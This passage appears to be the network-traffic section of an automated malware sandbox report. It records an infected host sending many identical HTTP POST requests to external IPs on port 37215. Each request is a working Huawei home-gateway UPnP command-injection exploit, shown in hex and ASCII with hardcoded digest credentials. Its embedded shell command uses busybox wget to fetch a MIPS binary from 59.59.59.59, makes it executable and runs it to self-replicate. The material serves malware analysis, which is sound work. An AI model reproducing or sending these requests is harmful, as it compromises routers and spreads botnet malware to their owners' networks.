                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1896192.168.2.1553758197.151.66.437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:16.999994040 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1897192.168.2.154399041.137.240.16937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:17.000016928 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1898192.168.2.1560770197.243.57.6437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:17.000092030 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1899192.168.2.1539426157.82.56.12437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:17.000109911 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1900192.168.2.1545226197.148.185.21937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:17.000134945 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1901192.168.2.1555460197.171.169.15737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:17.000222921 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1902192.168.2.1542146197.106.122.3837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:17.000241041 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1903192.168.2.154331241.93.2.5337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:17.000329018 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1904192.168.2.1534798157.83.99.3537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:17.000412941 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1905192.168.2.1535322204.79.62.12137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:17.000437021 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 